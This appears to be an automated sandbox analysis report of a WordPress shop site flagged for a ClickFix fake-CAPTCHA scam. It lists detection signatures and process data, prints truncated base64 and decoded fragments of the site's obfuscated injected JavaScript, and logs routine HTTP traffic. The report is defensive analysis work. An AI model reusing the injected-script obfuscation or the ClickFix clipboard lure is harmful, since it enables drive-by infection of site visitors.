Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://annavirgili.com

Overview

General Information

Sample URL:http://annavirgili.com
Analysis ID:1573651
Infos:

Detection

CAPTCHA Scam ClickFix
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
Creates files inside the system directory
Deletes files inside the Windows folder
HTML page contains hidden javascript code
HTML page contains obfuscated script src

Classification

  • System is w11x64_office
  • chrome.exe (PID: 6824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 290DF23002E9B52249B5549F0C668A86)
    • chrome.exe (PID: 7012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2008,i,16923723258563330455,8692166982377769583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11 MD5: 290DF23002E9B52249B5549F0C668A86)
  • chrome.exe (PID: 6648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://annavirgili.com" MD5: 290DF23002E9B52249B5549F0C668A86)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.2.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    1.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
      1.3.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: 1.2.pages.csv, type: HTML
        Source: Yara matchFile source: 1.1.pages.csv, type: HTML
        Source: Yara matchFile source: 1.3.pages.csv, type: HTML
        Source: https://annavirgili.com/HTTP Parser: Base64 decoded: const _0x27e5b9 = _0x4932;(function (_0x1cba6e, _0xe7489f) { const _0x4fe17f = _0x4932, _0x261214 = _0x1cba6e(); while (!![]) { try { const _0x31325 = parseInt(_0x4fe17f(0x180)) / (0x1df4 + 0x1d44 + -0x1e9 * 0x1f) * (parseInt(...
        Source: https://annavirgili.com/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4MjdlNWI5ID0gXzB4NDkzMjsKKGZ1bmN0aW9uIChfMHgxY2JhNmUsIF8weGU3NDg5ZikgewogICAgY29uc3QgXzB4NGZlMTdmID0gXzB4NDkzMiwgXzB4MjYxMjE0ID0gXzB4MWNiYTZlKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
        Source: https://annavirgili.com/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4MjdlNWI5ID0gXzB4NDkzMjsKKGZ1bmN0aW9uIChfMHgxY2JhNmUsIF8weGU3NDg5ZikgewogICAgY29uc3QgXzB4NGZlMTdmID0gXzB4NDkzMiwgXzB4MjYxMjE0ID0gXzB4MWNiYTZlKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
        Source: https://annavirgili.com/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4MjdlNWI5ID0gXzB4NDkzMjsKKGZ1bmN0aW9uIChfMHgxY2JhNmUsIF8weGU3NDg5ZikgewogICAgY29uc3QgXzB4NGZlMTdmID0gXzB4NDkzMiwgXzB4MjYxMjE0ID0gXzB4MWNiYTZlKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
        Source: https://annavirgili.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-K268W3Z
        Source: https://annavirgili.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-K268W3Z
        Source: https://annavirgili.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-K268W3Z
        Source: https://annavirgili.com/HTTP Parser: <input type="password" .../> found
        Source: https://annavirgili.com/HTTP Parser: No <meta name="author".. found
        Source: https://annavirgili.com/HTTP Parser: No <meta name="author".. found
        Source: https://annavirgili.com/HTTP Parser: No <meta name="author".. found
        Source: https://annavirgili.com/HTTP Parser: No <meta name="copyright".. found
        Source: https://annavirgili.com/HTTP Parser: No <meta name="copyright".. found
        Source: https://annavirgili.com/HTTP Parser: No <meta name="copyright".. found
        Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.25
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.101
        Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.25
        Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.25
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 104.126.37.201
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.101
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
        Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.111
        Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.111
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.41.3
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.111
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.97
        Source: global trafficHTTP traffic detected: GET /api/tips-content/de-ch/xml/tips?release=cobalt&environment=dashboard&resolutionType=merge HTTP/1.1Host: cxcs.microsoft.netConnection: keep-alivesec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Microsoft Edge";v="100", "Microsoft Edge WebView2";v="100"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://windows.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://windows.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "93eaa60326dc4c17c3c6a4c2dbeb6569"
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIS2yQEIpbbJAQipncoBCIb0ygEIlqHLAQiFoM0BCLKezgEI/aXOAQjtqc4BCOy8zgEIx8/OAQj/0M4BCJzSzgEIjtPOAQiz084BCOzVzgEY9MnNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: annavirgili.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/inc/elementor/widgets/assets/css/category_bg.css?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=7.6.2 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=7.6.2 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.9.6 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.css?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/front.css?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_featured/css/by_featured.css?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/color/css/html_types/color.css?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/image/css/html_types/image.css?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/slider/css/html_types/slider.css?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.15.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/elementor/css/post-403.css?ver=1709081757 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.6.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fami-templatekits/assets/css/fmtpl-addons.css?ver=1.0.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/elementor/css/global.css?ver=1709081757 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/elementor/css/post-8052462589213.css?ver=1733126350 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/elementor/css/post-336.css?ver=1709081758 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/css/bootstrap.min.css?ver=4.3.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.css?ver=1.5.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
